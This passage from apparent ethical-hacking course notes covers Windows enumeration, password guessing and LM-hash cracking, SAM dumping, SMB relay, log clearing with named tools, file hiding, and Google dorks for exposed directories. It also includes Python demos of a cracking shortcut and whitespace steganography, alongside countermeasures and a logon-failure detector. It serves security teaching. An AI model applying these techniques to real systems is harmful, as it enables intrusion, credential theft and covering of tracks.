account, the attacker must identify an open share to which he can connect. Also, if there is a lock
out policy in place, this must be determined. Otherwise, running tools such as NAT may result in
the lockout of all accounts. This will do the attacker little good unless he is attempting DoS. Tools
such as Enum, User Info, GetAcct, and SNMPUtil can be used to accomplish this task.
SNMP Enumeration
SNMP (Simple Network Management Protocol) is a network management standard widely used
within TCP/IP networks. It provides a means of managing routers, switches, and servers from
a central location. It works through a system of agents and managers. SNMP provides only
limited security through the use of community strings. The defaults are "public" and "private",
and they are transmitted over the network in clear text. SNMP-enabled devices share a lot
of information about themselves that probably should not be shared with unauthorized parties.
Hence, consider changing the default community strings, which act as the passwords.
SNMPUtil is a Windows enumeration tool that can be used to query computers running
SNMP.
IP Network Browser
SolarWinds IP Network Browser is a GUI based network discovery tool. It allows you to scan a
detailed discovery on one device or an entire subnet.
SNMP Enumeration Countermeasures
As with all other services, the principle of least privilege should also be followed here. If you don't
need SNMP, turn it off. You should always seek to remove or disable all unnecessary services. If
you must use SNMP, change the default community strings and block port 161 at key points
throughout the network.
4. WINDOWS HACKING & SYSTEM ATTACKS
System/Windows hacking is the point at which the line is crossed and an actual connection is made.
It is the first true attack phase as the attacker is actually breaking and entering. This may be
achieved by an administrative connection or an enumerated share.
Identifying Shares
One of the easiest ways to enumerate shares is with the net view command. This will identify all
public shares. Hidden shares, those followed by a "$", will not be displayed. Common hidden
shares include: IPC$, C$, D$ and Admin$. There are several GUI tools that can be used to identify
non-hidden and hidden shares, such as DumpSec and Legion.
Password Guessing
Many times, password guessing is successful because people like to use easy to remember words
and phrases. A diligent attacker will look for subtle clues throughout the enumeration process to
key in on probable words or phrases the account holder may have used for a password. Accounts
that will be focused on for possible attack include:
Accounts that haven't changed passwords
Service accounts
Shared accounts
Accounts that indicate the user has never logged in
Accounts that have information in the comment field that may compromise password
security
Manual Password Guessing
Assuming that a vulnerable account has been identified, the most common method of attack is
manual password guessing. The net use command can be issued from the command line to
attempt the connection.
Performing Automated Password Guessing
If manual password guessing was unsuccessful, attackers will most likely turn to automated tools.
Most automated password guessing tools use dictionaries to try to crack accounts. These attacks
can be automated from the command line by using the "FOR" command, or they can be
attempted by using tools such as NAT or ENUM. To use NAT, two files would first need to be
created. The first would contain a list of possible user names, while the second would comprise a
dictionary file. Each user name would be attempted with every word in the dictionary until a match
was achieved or all possibilities were exhausted.
Password Guessing Countermeasures
Password guessing is made much more difficult when administrators use strict password policies.
These policies should specify passwords that:
Are complex and sufficiently long
Contain upper case and lower case letters
Use numbers, letters, and special characters
It is not uncommon to hear individuals talk about pass-phrases; this concept helps users realize that
common words are not robust passwords. Another excellent password guessing countermeasure is
to simply move away from passwords completely, or to combine them with a second factor. Of the
three types of authentication (see below), passwords are the weakest:
Something You Know - Passwords
Something You Have - Smart Cards
Something You Are - Biometrics
Monitoring Event Viewer Logs
No matter which form of authentication you choose, policies should be in place that require the
regular review of event logs. Attacks cannot be detected if no one is monitoring activity; a burst of
failed logons against one account, or failures spread across many accounts from a single
workstation, is the signature of the guessing attacks described above. Luckily, there are tools to
ease the burden of log file review and management. VisualLast is one such tool: it summarizes
logon and logoff activity from the event log and has a number of sophisticated features.
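A detection pass over failed-logon events, added here as example code (not a tool from the workshop). The log lines are constructed, in a simplified one-line-per-event layout rather than a real Event Viewer export, and the thresholds are assumptions; event ID 529 is the NT/2000 "logon failure: unknown user name or bad password" event and 528 the successful logon. The two rules are the ones a reviewer applies by hand: many failures for one account, and failures across several accounts from one source.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of logon events. The one-line layout is an assumption made
# for the example; real exports look different, only the event IDs are real.
SAMPLE_LOG = """\
2004-03-02 09:12:01 EventID=529 User=jsmith Workstation=WS-07
2004-03-02 09:12:03 EventID=529 User=jsmith Workstation=WS-07
2004-03-02 09:12:04 EventID=529 User=jsmith Workstation=WS-07
2004-03-02 09:12:06 EventID=529 User=jsmith Workstation=WS-07
2004-03-02 09:12:07 EventID=529 User=jsmith Workstation=WS-07
2004-03-02 09:12:09 EventID=528 User=jsmith Workstation=WS-07
2004-03-02 10:00:00 EventID=529 User=administrator Workstation=WS-99
2004-03-02 10:00:01 EventID=529 User=svc_backup Workstation=WS-99
2004-03-02 10:00:02 EventID=529 User=guest Workstation=WS-99
2004-03-02 10:00:03 EventID=529 User=jsmith Workstation=WS-99
2004-03-02 11:30:00 EventID=529 User=mlee Workstation=WS-12
"""

LINE_RE = re.compile(r"^(\S+ \S+) EventID=(\d+) User=(\S+) Workstation=(\S+)$")

def parse(log_text):
    """Return a list of (timestamp, event_id, user, workstation); skips unparseable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append((ts, int(m.group(2)), m.group(3), m.group(4)))
    return events

def detect(events, window=timedelta(minutes=5), per_user=5, per_source_users=3):
    """Two sliding-window rules over failed logons (event 529):
    brute_force: at least per_user failures for one account inside the window
    spray: failures against at least per_source_users distinct accounts from one workstation
    Returns a sorted list of (rule, key) alerts, each key reported once."""
    alerts = set()
    by_user = defaultdict(deque)      # user -> timestamps of recent failures
    by_source = defaultdict(deque)    # workstation -> (timestamp, user) of recent failures
    for ts, event_id, user, workstation in sorted(events):
        if event_id != 529:
            continue
        recent = by_user[user]
        recent.append(ts)
        while recent and ts - recent[0] > window:
            recent.popleft()
        if len(recent) >= per_user:
            alerts.add(("brute_force", user))
        source = by_source[workstation]
        source.append((ts, user))
        while source and ts - source[0][0] > window:
            source.popleft()
        if len({u for _, u in source}) >= per_source_users:
            alerts.add(("spray", workstation))
    return sorted(alerts)
```

On the sample, jsmith's five failures in eight seconds trip the first rule and WS-99 trips the second. The 528 success that follows jsmith's burst is the line a reviewer should read next: a success right after a run of failures is the pattern of a guess that worked.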
Sniffing Passwords
Windows uses a challenge/response authentication method based on the NTLM protocol. To log
on across the network, the client contacts a server (or domain controller), the server sends a
random challenge, and the client returns a response computed from the challenge and the hash of
the user's password. The hash itself never crosses the wire, but an attacker who captures the
challenge and the response can try candidate passwords against them offline. NTLM also
functions in a peer-to-peer network. Through the years, NTLM has evolved. The three basic forms
are listed below:
LAN Manager (LM) - Insecure, used for Windows 3.11, 95, and 98 computers
NTLM v1 - Used for Windows NT Service Pack 3 or earlier
NTLM v2 - A more secure version of the challenge/response protocol, introduced with NT 4.0
Service Pack 4 and used by Windows 2000 and XP
One problem with NTLM is that it is backwards compatible by default. This means that if the
network contains Windows 95/98 computers, the protocol will step down to the weaker form of
authentication to allow them to authenticate. This is a big security risk. It is advisable to disable
the weaker forms by raising the "Network security: LAN Manager authentication level" setting
under Local Policies > Security Options (the LMCompatibilityLevel registry value). Another
problem with NTLM is that tools have been developed that can recover passwords from a captured
logon exchange. One such set of tools is ScoopLM and BeatLM from
http://www.securityfriday.com; another is L0phtCrack, which can crack from sniffed traffic. NTLM
is not the only protocol that might be sniffed on an active network. Tools also exist to capture and
crack Kerberos authentication. The Kerberos protocol was developed to provide a secure means
for mutual authentication between a client and a server and is found in large, complex network
environments. One tool that might be used to attempt to defeat it is KerbCrack, which attacks the
password used to encrypt the pre-authentication data in captured Kerberos logon exchanges.
Privilege Escalation
If by this point the attacker has compromised an account, but not one of administrator status, the
amount of damage he can do is limited. To be in full control of the system, the attacker needs
administrator status. This is achieved through privilege escalation. What makes this most
difficult is that these exploits must typically be run on the system under attack. Three ways this
may be achieved:
Trick the user into executing a particular program.
Copy the privilege escalation program to the system and schedule it to run at a
predetermined time
Gain interactive access to the system.
Retrieving the SAM File
One of the first activities that an attacker will usually attempt after gaining administrative access is
stealing the SAM (Security Account Manager) database. The SAM contains the user account
passwords stored in hashed form (the LM and NT hashes). Microsoft raised the bar with the release
of NT 4.0 Service Pack 3, which introduced SYSKEY, a second layer of encryption over the stored
hashes using a 128-bit key. Even an attacker who copies the SAM from disk must still defeat that
encryption. Todd Sabin found a way around this through DLL injection and created a tool called
pwdump2: it injects into the privileged LSASS process, which already holds the decrypted hashes,
and dumps them from there, bypassing SYSKEY. pwdump2 requires administrative access.
Cracking Windows Passwords
Once the passwords have been stolen, they will need to be cracked. This can be accomplished by
using a password-cracking program. Password cracking programs can mount several different
types of attacks. These include:
Dictionary Attack
Hybrid Attack
Brute Force Attack.
Windows Password Insecurities
One of the big insecurities of Windows passwords is that if the Windows 2000 domain is set up to
be backwards compatible, each password is also stored as a LAN Manager (LANMAN or LM)
hash, which only covers the first 14 characters. What makes LANMAN quickly crackable is that
before hashing the password is converted to upper case, padded with nulls to 14 characters and
divided into two 7-character fields, each of which is hashed independently (each half is used as a
DES key to encrypt a fixed string). Thus cracking can proceed simultaneously against each
7-character half, the keyspace is that of 7 characters rather than 14, and a password of 7
characters or fewer is revealed immediately because its second half hashes to a well-known
constant. Windows does not store an LM hash at all for passwords of 15 characters or more.
Several tools are available to exploit this weakness, including L0phtCrack and John the Ripper.
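An added Python example of why the split matters (it is not code from the workshop or from any of the tools it names). The real LM hash uses each 7-byte half as a DES key to encrypt the constant "KGS!@#$%"; that DES step is replaced here with SHA-256 over the same inputs, an assumption made so the block runs on the standard library alone. The pre-processing (upper-casing, null padding, the 7+7 split, no hash at all from 15 characters) and the half-by-half attack are as described above; the attack cost is what changes nothing about the substitution.

```python
import hashlib
import itertools
import string

MAGIC = b"KGS!@#$%"   # the constant the real LM hash DES-encrypts with each half as key

def _half_hash(half: bytes) -> bytes:
    """Stand-in for DES_key(MAGIC) with key = the 7-byte half.
    Assumption: SHA-256 replaces DES so the example needs no crypto library."""
    return hashlib.sha256(MAGIC + half).digest()[:8]

def lm_preprocess(password: str):
    """Upper-case, truncate/pad to 14 bytes with nulls, split into two 7-byte halves."""
    raw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]

def lm_hash(password: str) -> bytes:
    """16-byte LM-style hash, or b"" for 15+ character passwords (Windows stores none)."""
    if len(password) >= 15:
        return b""
    first, second = lm_preprocess(password)
    return _half_hash(first) + _half_hash(second)

EMPTY_HALF = _half_hash(b"\x00" * 7)   # hash of an all-null half: password was <= 7 chars

def crack_lm(target: bytes, alphabet: str = string.ascii_uppercase + string.digits,
             max_len: int = 7):
    """Recover a password from its LM-style hash by attacking the two halves independently.
    Work is at most 2 * len(alphabet)**7 half-hashes instead of len(alphabet)**14.
    Returns (password_in_upper_case, number_of_half_hashes_computed)."""
    halves = [target[:8], target[8:]]
    recovered = [None, None]
    if halves[1] == EMPTY_HALF:
        recovered[1] = ""            # second half known for free: short password
    tries = 0
    for length in range(1, max_len + 1):
        for letters in itertools.product(alphabet, repeat=length):
            if None not in recovered:
                break
            text = "".join(letters)
            tries += 1
            h = _half_hash(text.encode().ljust(7, b"\x00"))
            for i in (0, 1):
                if recovered[i] is None and h == halves[i]:
                    recovered[i] = text
    return "".join(part or "" for part in recovered), tries
```

Two things to notice when running it: the hash of "abc" and "ABC" is identical because case is discarded before hashing, and a nine-character password over a six-symbol alphabet falls in well under 2 x 6^7 half-hashes, whereas a single 14-character field would have cost up to 6^14.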
Password Cracking Countermeasures
The domain password policy should be configured to prevent users from reusing a password, or at
least to require that eight to ten new passwords be used before an old one can be chosen again.
This policy can be enforced through the local or domain security policy. Passwords:
Should be at least 8 characters long, and ideally 15 or more so that no LM hash is stored
Should mix upper and lower case
Should contain numbers, letters, and special characters (*!&@#%$)
Should have a maximum life of no more than 30 days
Another countermeasure to password cracking is to use one-time passwords. There are several
different one-time password schemes available; hardware tokens such as RSA SecurID are a
popular choice, and smart cards are the most widely used replacement for passwords altogether.
SMB Redirection
An SMB (Server Message Block) redirect attack may be attempted by tricking a user into
authenticating to a bogus SMB server. This allows the attacker to capture the victim's
challenge/response, which can be cracked offline or relayed to another host while it is still valid.
This may be attempted by tricking the user into clicking a link embedded in an e-mail (a link to a
UNC path or an image hosted on the attacker's server is enough; Windows authenticates
automatically). Users should always use caution when clicking on e-mail links. Several tools are
available to help attackers pull off this hack. One of these is SMBRelay, a fraudulent SMB server
that captures the authentication exchange and relays it.
Physical Access
If an attacker can gain physical access to your facility or equipment, he'll own it. Without
physical access control, all administrative and technical barriers can typically be overcome. This
holds true for any piece of equipment. Even routers are not immune: Cisco's website details how
to reset passwords if you have physical access (http://www.cisco.com/warp/public/474/).
Many programs are available that can be used to bypass NTFS security or to reset the
administrator password when the machine is booted from removable media; some of them are
Offline NT Password Resetter, NTFSDOS and LinNT. Full-disk encryption is the control that
keeps a stolen or rebooted machine's files out of reach.
Keystroke Logging
Keystroke loggers (or keyloggers) can be hardware or software based. They intercept every
keystroke the target types and either save the log in a file to be read later or transmit it to a
predetermined destination accessible to the attacker; some, such as eBlaster, secretly e-mail the
captured keystrokes to a predetermined account. Since they record everything typed at the
keyboard, they can capture a wide variety of confidential information, including passwords, credit
card numbers, private e-mail correspondence, names, addresses and phone numbers.
Some Famous Keyloggers
Actual Spy
Perfect Keylogger
Family Keylogger
Home Keylogger
Soft Central Keylogger
Adramax Keylogger
Rootkits
Rootkits are malicious code developed for the specific purpose of allowing attackers to retain
privileged access to a system and hide their presence (files, processes and network connections).
While rootkits have been available in the Linux world for many years, they are now starting to
make their way into the Windows environment. Rootkits are generally free and readily available
on the Internet. If you suspect a computer has been rootkitted, you will need to compare the
system's binaries against known-good checksums with an MD5 checksum utility or a program
such as Tripwire to determine whether your programs can be trusted; a rootkitted system cannot
be trusted to report on itself, so the check should be run from clean media. The only other
alternative is to rebuild the computer from known good media.
Evidence Hiding
Once an attacker has gained full control of the victim's computer, he will typically try to cover his
tracks. According to Locard's Exchange Principle, "whenever someone comes in contact with
another person, place, or thing, something of that person is left behind." This means the attacker
must clear log files, eliminate evidence, and cover his tracks. A common tool the attacker will use
to disable logging is the auditpol command. The attacker will also attempt to clear the log. This
may be accomplished with the Elsave tool, which removes all entries from the logs except one
showing that the logs were cleared; that single "log cleared" event is itself worth alerting on. Other
tools an attacker may attempt to use at this point include Winzapper (which removes individual
entries from the security log) and Evidence Eliminator.
File Hiding
Various techniques are used by attackers in an attempt to hide their tools on the compromised
computer. Some attackers may just use attrib to set the hidden attribute, while others may place
their warez in low-traffic areas; e.g., winnt/system32/os2drivers. One of the most advanced file
hiding techniques is NTFS file streaming (alternate data streams), which attaches data to an
existing file without changing its apparent size. A tool that is available to detect streamed files is
Sfind.
Data Hiding
Other data hiding techniques deal with moving information in and out of networks undetected. This
can be accomplished by embedding it in bitmaps, MP3 files, document whitespace, and others.
Each is briefly described below:
Steganography - The art of hiding data inside an innocuous carrier such as an image or sound file
ImageHide - A stego program that hides text in images
MP3Stego - A stego program that hides text in MP3 files
Snow - A stego program that hides text in the trailing whitespace of text files
Camera/Shy - Used to hide text in web-based images
While there are tools such as Stegdetect that can sometimes identify files carrying a hidden payload,
that by no means guarantees you will be able to break the encryption protecting the payload and
uncover its contents.
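The whitespace technique written out in Python as an added example (this is not the Snow tool, whose exact encoding the text above does not give): the bits of the payload are appended to each line of a cover text as spaces and tabs, so the file looks unchanged in an editor. The cover text and payload are constructed. The detector shows the check a reviewer can run, and the last function shows the fragility: anything that strips trailing whitespace destroys the payload.

```python
# Constructed cover text: ordinary-looking notes with no trailing whitespace.
COVER = "\n".join([
    "Meeting notes, 2 March",
    "Attendees: network team, helpdesk",
    "Action: rotate the backup service account",
    "Action: review share permissions on FS01",
    "Action: schedule the firewall change window",
    "Next meeting in two weeks",
    "Bring the updated asset list",
    "End of notes",
])

def hide(cover: str, secret: bytes, bits_per_line: int = 8) -> str:
    """Append the payload bits to each line as trailing whitespace: space = 0, tab = 1."""
    bits = "".join(f"{byte:08b}" for byte in secret)
    lines = cover.split("\n")
    capacity = len(lines) * bits_per_line
    if len(bits) > capacity:
        raise ValueError(f"cover holds {capacity} bits, payload needs {len(bits)}")
    out = []
    for i, line in enumerate(lines):
        chunk = bits[i * bits_per_line:(i + 1) * bits_per_line]
        out.append(line.rstrip(" \t") + "".join("\t" if b == "1" else " " for b in chunk))
    return "\n".join(out)

def reveal(text: str) -> bytes:
    """Read trailing whitespace back into bytes; an incomplete final byte is dropped."""
    bits = ""
    for line in text.split("\n"):
        trailing = line[len(line.rstrip(" \t")):]
        bits += "".join("1" if c == "\t" else "0" for c in trailing)
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))

def suspicious_lines(text: str) -> int:
    """Detection check: count lines whose trailing whitespace contains a tab,
    a pattern ordinary editors almost never produce."""
    count = 0
    for line in text.split("\n"):
        trailing = line[len(line.rstrip(" \t")):]
        if "\t" in trailing:
            count += 1
    return count

def strip_trailing_whitespace(text: str) -> str:
    """What a mail gateway, editor or linter typically does; it destroys the payload."""
    return "\n".join(line.rstrip(" \t") for line in text.split("\n"))
```

Eight cover lines at eight bits each carry a six-byte payload with room to spare; the same cover refuses a longer one. Stripping trailing whitespace returns exactly the original cover, which is why a sanitizing gateway is as good a countermeasure as a detector here.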
Prompting the Box
The final step for the attacker is getting a command prompt on the target. Up to this point, the
attacker has been able to maintain a connection to the target, but may not yet have the ability to
execute and run programs on it. The following three tools will give the attacker an interactive
shell on the target: PsExec, Remoxec, and Netcat. When the attacker has a command prompt on
the victim's computer, he will typically restart the methodology from that machine, looking for
other internal targets to attack and compromise.
5. GOOGLING/GOOGLE HACKING
Google Searching Basics:
Building Google Queries:
Google query building is a process. There's really no such thing as an incorrect search. It's
entirely possible to create an ineffective search, but with the explosive growth of the Internet and
the size of Google's cache, a query that's inefficient today may just provide good results
tomorrow, or next month or next year. The idea behind effective Google searching is to get a
firm grasp on the basic syntax and then to get a good grasp of effective narrowing techniques.
Learning the Google query syntax is the easy part. Learning to effectively narrow searches can take
quite a bit of time and requires a bit of practice. Eventually, you'll get a feel for it, and it will
become second nature to find the needle in the haystack.
Golden Rules of Google Searching:
1. Google queries are not case sensitive.
Google doesn't care if you type your query in lowercase letters (hackers), uppercase
(HACKERS), camel case (hAcKeR), or psycho-case (haCKeR); the word is always
regarded the same way.
2. Google wildcards
Google's concept of wildcards is not the same as a programmer's concept of wildcards.
Most programmers consider a wildcard to be either a symbolic representation of any single
character (UNIX fans may think of the question mark) or of any series of characters,
represented by an asterisk. Google's wildcard, the asterisk (*), represents nothing more
than a single whole word in a search phrase. Using an asterisk at the beginning or end of
a word will not provide you any more hits than using the word by itself.
3. Google stems automatically.
Google will stem, or expand, words automatically when it's appropriate. For example,
consider a search for pet lemur dietary needs, as shown in Figure 1.12. Google will return
a hit that includes the word lemur along with pet and, surprisingly, the word diet, which
is a stem of dietary. Keep in mind that this automatic stemming feature can provide you
with unpredictable results.
4. Google reserves the right to ignore you
Google ignores certain common words, characters, and single digits in a search. These
are sometimes called stop words. When Google ignores any of your search terms, you
will be notified on the results page, just below the query box, as shown in Figure 1.13.
Some common stop words include who, where, what, the, a, or an. Curiously enough, the
logic for word exclusion can vary from search to search.
5. Ten-word limit
Google limits searches to 10 terms. This includes search terms as well as advanced
operators, which we'll discuss in a moment. There is a fairly effective way to get more
than 10 search terms crammed into a query: replace Google's ignored terms with the
wildcard character (*). Google does not count the wildcard character as a search term,
allowing you to extend your searches quite a bit.
Basic Searching
Google searching is a process, the goal of which is to find information about a topic. The process
begins with a basic search, which is modified in a variety of ways until only the pages of relevant
information are returned. Google‘s ranking technology helps this process along by placing the
highest-ranking pages on the first results page. The details of this ranking system are complex and
somewhat speculative, but suffice it to say that for our purposes Google rarely gives us exactly
what we need following a single search.
Using Boolean Operators and Special Characters
More advanced than basic word searches, phrase searches are still a basic form of a Google query.
To perform advanced queries, it is necessary to understand the Boolean operators AND, OR, and
NOT. To properly segment the various parts of an advanced Google query, we must also explore
visual grouping techniques that use the parenthesis characters. Finally, we will combine these
techniques with certain special characters that may serve as shorthand for certain operators,
wildcard characters, or placeholders. Boolean operators help specify the results that are
returned from a query. If you are already familiar with Boolean operators, take a moment to skim
this section to help you understand Google‘s particular implementation of these operators, since
many search engines handle them in different ways. Improper use of these operators could
drastically alter the results that are returned.
The most commonly used Boolean operator is AND. This operator is used to include multiple
terms in a query. For example, a simple query like hacker could be expanded with a Boolean
operator by querying for hacker AND cracker. The latter query would include not only pages that
talk about hackers but also sites that talk about hackers and the snacks they might eat. Some search
engines require the use of this operator, but Google does not. The term AND is redundant to
Google. By default, Google automatically searches for all the terms you include in your query.
The plus symbol (+) forces the inclusion of the word that follows it. There should be no space
following the plus symbol.
Another common Boolean operator is NOT. Functionally the opposite of the AND operator, the
NOT operator excludes a word from a search. One way to use this operator is to preface a search
word with the minus sign (-). Be sure to leave no space between the minus sign and the search
term. Consider a simple query such as hacker. This query is very generic and will return hits for all
sorts of occupations, like golfers, woodchoppers, serial killers, and those with chronic bronchitis.
With this type of query, you are most likely not interested in each and every form of the word
hacker but rather a more specific rendition of the term. To narrow the search, you could include
more terms, which Google would automatically AND together, or you could start narrowing the
search by using NOT to remove certain terms from your search.
Google Advanced Operators:
Introduction
Beyond the basic searching techniques explored in the previous section, Google offers special
terms known as advanced operators to help you perform more advanced queries. These operators,
when used properly, can help you get to exactly the information you're looking for without
spending too much time poring over page after page of search results. When advanced operators
are not provided in a query, Google will locate your search terms in any area of the Web page,
including the title, the text, the URL, or the like. We take a look at the following advanced operators
in this section:
(a) intitle, allintitle
(b) inurl, allinurl
(c) filetype
(d) allintext
(e) site
(f) link
(g) inanchor
(h) daterange
(i) cache
(j) info
(k) related
(l) phonebook
(m) rphonebook
(n) bphonebook
(o) author
(p) group
(q) msgid
(r) insubject
(s) stocks
(t) define
Operator Syntax
An advanced operator is nothing more than a part of a query. You provide advanced operators to
Google just as you would any other query. In contrast to the somewhat free-form style of standard
Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The
basic syntax of a Google advanced operator is operator:search_term. When using advanced
operators, keep in mind the following:
There is no space between the operator, the colon, and the search term. Violating this
syntax can produce undesired results and will keep Google from understanding the
advanced operator. In most cases, Google will treat a syntactically bad advanced operator
as just another search term. For example, providing the advanced operator intitle without
a following colon and search term will cause Google to return pages that contain the word
intitle.
The search term uses the same syntax as the search terms we covered in the previous section.
For example, you can provide as a search term a single word or a phrase surrounded
by quotes. If you provide a phrase as the search term, make sure there are no spaces
between the operator, the colon, and the first quote of the phrase.
Boolean operators and special characters (such as OR and +) can still be applied to
advanced operator queries, but be sure not to place them in the way of the separating colon.
Advanced operators can be combined in a single query as long as you honor both the basic
Google query syntax as well as the advanced operator syntax. Some advanced operators
combine better than others, and some simply cannot be combined.
The ALL operators (the operators beginning with the word ALL) are oddballs. They are
generally used once per query and cannot be mixed with other operators.
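A small checker for these rules, added as example code (it is not part of the workshop material, and Google offers no such tool). It tokenizes a query the way the syntax above describes, reports the mistakes listed (a space after the colon, an operator with no colon, an ALL operator mixed with others, more than ten counted terms) and assembles the index.of style queries used later in this section. The operator list is the one given above; how Google counted the words inside a quoted phrase is not stated on the page, so the counter treats each token as one term, an assumption.

```python
import re
import shlex

# Operators listed in this section (intext and numrange are named elsewhere on the page).
ADVANCED_OPS = {
    "intitle", "allintitle", "inurl", "allinurl", "filetype", "allintext", "intext",
    "site", "link", "inanchor", "daterange", "numrange", "cache", "info", "related",
    "phonebook", "rphonebook", "bphonebook", "author", "group", "msgid", "insubject",
    "stocks", "define",
}
MAX_TERMS = 10  # the ten-word limit described earlier
_SPACE_AFTER_COLON = re.compile(
    r"(?<![\w.-])(" + "|".join(sorted(ADVANCED_OPS)) + r"):\s")

def tokenize(query: str):
    """Split on whitespace but keep quoted phrases (and operator:"phrase") together."""
    return shlex.split(query)

def operator_of(token: str):
    """Return the operator name if the token is operator:term, else None."""
    name, sep, _ = token.lstrip("-+").partition(":")
    return name.lower() if sep and name.lower() in ADVANCED_OPS else None

def count_terms(tokens):
    """Each word, phrase or operator:term counts as one term; the * wildcard is free.
    Assumption: a quoted phrase counts once (the page does not say otherwise)."""
    return sum(1 for t in tokens if t != "*")

def problems(query: str):
    """List the syntax mistakes described in the text; empty when the query is clean."""
    issues = []
    if _SPACE_AFTER_COLON.search(query):
        issues.append("space after an operator's colon: Google treats it as a plain word")
    tokens = tokenize(query)
    for t in tokens:
        if ":" not in t and t.lower() in ADVANCED_OPS:
            issues.append(f"'{t}' has no colon and will be searched for as a word")
    ops = [op for op in map(operator_of, tokens) if op]
    if any(op.startswith("all") for op in ops) and len(ops) > 1:
        issues.append("an all* operator must stand alone; it cannot be mixed with other operators")
    n = count_terms(tokens)
    if n > MAX_TERMS:
        issues.append(f"{n} terms exceed the {MAX_TERMS}-term limit; replace stop words with *")
    return issues

def index_of_query(directory=None, filename=None, server=None):
    """Assemble the directory-listing queries used later in this section."""
    parts = ["intitle:index.of"]
    if directory:
        parts.append(f"inurl:{directory}")
    if filename:
        parts.append(filename)
    if server:
        parts.append(f'"{server} Server at"')
    query = " ".join(parts)
    if problems(query):                 # the builder must never emit a broken query
        raise ValueError(problems(query))
    return query
```

The builder raises rather than returning a query the checker rejects, so a directory or server string containing a stray space after a colon is caught before it is pasted into a search box.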
Google‘s Advanced Operators
Intitle and Allintitle: Search Within the Title of a Page
Allintext: Locate a String Within the Text of a Page
Inurl and Allinurl: Finding Text in a URL
Site: Narrow Search to Specific Sites
Filetype: Search for Files of a Specific Type
Link: Search for Links to a Page
Inanchor: Locate Text Within Link Text
Cache: Show the Cached Version of a Page
Numrange: Search for a Number
Daterange: Search for Pages Published Within a Certain Date Range
Info: Show Google‘s Summary Information
Related: Show Related Sites
Author: Search Groups for an Author of a Newsgroup Post
Group: Search Group Titles
Insubject: Search Google Groups Subject Lines
Msgid: Locate a Group Post by Message ID
Stocks: Search for Stock Information
Define: Show the Definition of a term
Phonebook: Search Phone Listings
Google Hacking Basics:
Anonymity with Caches
Google's cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or
document, you can almost always count on getting a copy of it, even if the original source has since
dried up and blown away. Of course the down side of this is that hackers can get a copy of your
sensitive data even if you've pulled the plug on that pesky Web server. Another down side of the
cache is that the bad guys can crawl your entire Web site (including the areas you "forgot" about)
without even sending a single packet to your server. If your Web server doesn't get so much as a
packet, it can't write anything to the log files. If there's nothing in the log files, you might not have
any idea that your sensitive data has been carried away. It's sad that we even have to think in these
terms, but untold megabytes, gigabytes, and even terabytes of sensitive data leak from Web servers
every day. Understanding how hackers can mount an anonymous attack on your sensitive data via
Google's cache is of utmost importance. Google grabs a copy of most Web data that it crawls.
There are exceptions, and this behavior is preventable (a noarchive robots meta tag on a page tells
Google not to keep a cached copy of it).
Google as a Proxy Server
Although this technique might not work forever, at the time of this writing it's possible to use
Google itself as a proxy server. This technique requires a Google translated URL and some
minor URL modification. To make this work, we first need to generate a translation URL. The
easiest way to do this is through Google's translation service, located at
www.google.com/translate_t. If you were to enter a URL into the "Translate a web page" field,
select a language pair, and click the Translate button, Google would translate the contents of the
Web page and generate a translation URL that could be used for later reference. The langpair
parameter, which is only available for the translation service, describes which languages to
translate from and to, respectively. The arguments to this parameter are identical to those of the hl
parameter. What would happen if we were to translate a page from one language into the same
language? This would change our translation URL to:
http://www.google.com/translate?u=http%3A%2F%2Fwww.google.com&langpair=en%7Cen&hl=en&ie=Unknown&oe=ASCII
If we loaded this URL into our browser, and if the source page were in English to begin with, we
would see a page. First, you should notice that the Google search page in the bottom frame of the
browser window looks pretty familiar. In fact, it looks identical to the original search page. This is
because no real language translation occurred. The top frame of the browser window shows the
standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to
show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately,
there is a payoff when we consider what happens behind the scenes. Let's look at another example,
this time translating the www.phrack.org/hardcover62/ Web page while monitoring our own
network traffic with tcpdump -n -U -t. This is not a perfect proxy solution and should not be used
as the sole proxy server in your toolkit. We present it simply as an example of what a little creative
thinking can accomplish. While Google is acting as a proxy server, it is a transparent proxy
server, which means the target Web site can still see our IP address in the connection logs, despite
the fact that Google grabbed the page for us.
Directory Listings
A directory listing is a type of Web page that lists files and directories that exist on a Web server.
Designed to be navigated by clicking directory links, directory listings typically have a title that
describes the current directory, a list of files and directories that can be clicked, and often a footer
that marks the bottom of the directory listing. Much like an FTP server, directory listings offer a
no-frills, easy-install solution for granting access to files that can be stored in categorized folders.
Unfortunately, directory listings have many faults, specifically:
They are not secure in and of themselves. They do not prevent users from downloading
certain files or accessing certain directories. This task is often left to the protection
measures built into the Web server software or third-party scripts, modules, or programs
designed specifically for that purpose.
They can display information that helps an attacker learn specific technical details about
the Web server.
They do not discriminate between files that are meant to be public and those that are
meant to remain behind the scenes.
They are often displayed accidentally, since many Web servers display a directory listing
if a top-level index file (index.htm, index.html, default.asp, and so on) is missing or
invalid.
All this adds up to a deadly combination.
Locating Directory Listings
The most obvious way an attacker can abuse a directory listing is by simply finding it! Since
directory listings offer "parent directory" links and allow browsing through files and folders, even
the most basic attacker might soon discover that sensitive data can be found by simply locating the
listings and browsing through them. Locating directory listings with Google is fairly straightforward.
An obvious query to find such pages might be intitle:index.of, which finds pages with the term
index of in the title of the document. Remember that the period (".") serves as a single-character
wildcard in Google. Unfortunately, this query will return a large number of false positives such as
pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these Web pages
intentional, they are also not the type of directory listings we are looking for.
Finding Specific Directories
In some cases, it might be beneficial not only to look for directory listings but to look for directory
listings that allow access to a specific directory. This is easily accomplished by adding the name of
the directory to the search query. To locate "admin" directories that are accessible from directory
listings, queries such as intitle:index.of.admin or intitle:index.of inurl:admin will work well.
Finding Specific Files
Because of the directory tree style, it is also possible to find specific files in a directory listing. For
example, to find WS_FTP log files, try a search such as intitle:index.of ws_ftp.log. This technique
can be extended to just about any kind of file by keying in on the index.of in the title and the
